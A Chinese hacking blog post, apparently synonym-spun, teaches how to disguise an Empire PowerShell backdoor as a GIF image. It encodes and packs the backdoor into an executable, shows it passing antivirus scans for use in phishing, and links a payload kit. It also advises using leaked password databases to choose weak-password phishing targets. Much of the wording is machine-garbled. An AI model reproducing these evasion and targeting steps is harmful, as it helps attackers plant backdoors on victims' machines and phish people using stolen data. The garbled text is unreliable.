快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

永生之火:相对于持久的绕过要领以及一点设法主张

永生之火:相对于持久的绕过要领以及一点设法主张

*

近来团队的web突破口老跟我求后门玩钓鱼,就来写这么一篇文章。

演示视频

看不到?点这里

基于很多渗透排泄测试的框架,以及出色的 backdoor 程序,现在的后门已经不仅仅局限与 tcp/ip 了,今天分享的器械算不算干货呢?就靠读者同伙们来定义了。

玩攻击典礼感很重要,招招有理招招有据,能生决心信念,所以我把这套流程鸣做“永生之火”,接下来最先尝试吧。

练手平台

WK(win+kali)

工具预备

gif/jpg/png任意图片一张

Empire下载地址:https://github.com/EmpireProject/Empire

Script Encoder

行使装备包 

https://github.com/flagellantX/0dayplay(下载压缩包,都打包好了)

彩蛋

老同伙都知道我肯定会附送彩蛋,这个彩蛋是针对Webhacker或者是渗透排泄测试的纯初学者或者还不知道怎么入门的同伙们推荐的,当然你们知道我对这块是不懂的,资料是web狗给我的,内容是澳洲的Web安全专家Troy Hunt的地下课

言回正传,先来到今天的技能点添加环节:

Let’s Go!

永生之火:相对于持久的绕过要领以及一点设法主张Co妹妹and:

listeners

use listener http 
set Name flagellantX 

execute

launcher powershell flagellantX

永生之火:相对于持久的绕过要领以及一点设法主张

接着我们关上这个网站,将我们选好的gif动图转换成base64

永生之火:相对于持久的绕过要领以及一点设法主张

永生之火:相对于持久的绕过要领以及一点设法主张

接着将base64的编码值复制到我们的行使代码段地位

永生之火:相对于持久的绕过要领以及一点设法主张

永生之火:相对于持久的绕过要领以及一点设法主张

紧接着我们生成一下powershell(launcher powershell flagellantX),并将powershell复制到行使代码的代码段:

永生之火:相对于持久的绕过要领以及一点设法主张

永生之火:相对于持久的绕过要领以及一点设法主张

将所有器械整个copy到Script Encoder:

永生之火:相对于持久的绕过要领以及一点设法主张

将右边框Convert好的代码所有复制,并打包成一个可执行的文件:

永生之火:相对于持久的绕过要领以及一点设法主张

永生之火:相对于持久的绕过要领以及一点设法主张

到了这一步我们今天义务实现了80%了,我们可以上一下大卫士扫一扫

我机子内里还有绒儿,一块儿扫一下看看,欧98k,服毒吧:

13.jpg

关上会是如许:

永生之火:相对于持久的绕过要领以及一点设法主张

永生之火:相对于持久的绕过要领以及一点设法主张

关于empire的后渗透排泄行使的话,FB有很多文章,人人搜一下了解一下我这边就打住了。

那么这招行使到传统的RAT可以完成绕过吗?

谜底是,欧98K,过程差不久不多,不赘述了:

永生之火:相对于持久的绕过要领以及一点设法主张

题外话

问:为什么每一次都是它?

答:谁?…

问:为什么每一次都是大卫士!!

答:因为它云上传很厉害啊。

问:这招分享了会不会像之前的鱼竿钓鱼那样被杀?

答:这个姿势我照样比较有自大的,无非再好的后门使用认数达到定量也会变成报毒后门。

问:干!那怎么办???!

答:绕过的办法很多,多学多找多探讨.

一点设法主张,微博同伙私信交流的关于隐衷数据库就是通常说的社工裤,有人说实在暗码一改就算打到人,然则以为可能那一个T的数据就没有价值了(暗码纰谬),那么它的实战价值事其实何处呢?

实在要是我在阐发的话,就算一个裤子很老,这个数据也是可以行使的。要是对构造或者企业点对点渗透排泄,而且网上有一个老裤子,我肯定会下载下来,把弱暗码人群罗列出来,因为很简单,他/她既然对暗码安全没什么敏感,那么下次修改的暗码也不会太复杂,然后换一个角度思考,不从账号暗码考虑,他/她的安全意识肯定比别人要低(123456肯定弱于iloveyou1234!),那么把他/她作为钓鱼目标,成功率是否是就高多了?这是我一点看法。

Eggs:

下载地址

From:永生之火:相对于持久的绕过要领以及一点设法主张

关于本文或者别的好玩的渗透排泄测试技巧,黑客漏洞,要是有更好的意见可以在weibo@flagellantX私信或者评述跟我叨逼叨,直接说思路设法主张,无比喜悦愿意讨论出一些干货。

*

您可能还会对下面的文章感兴趣: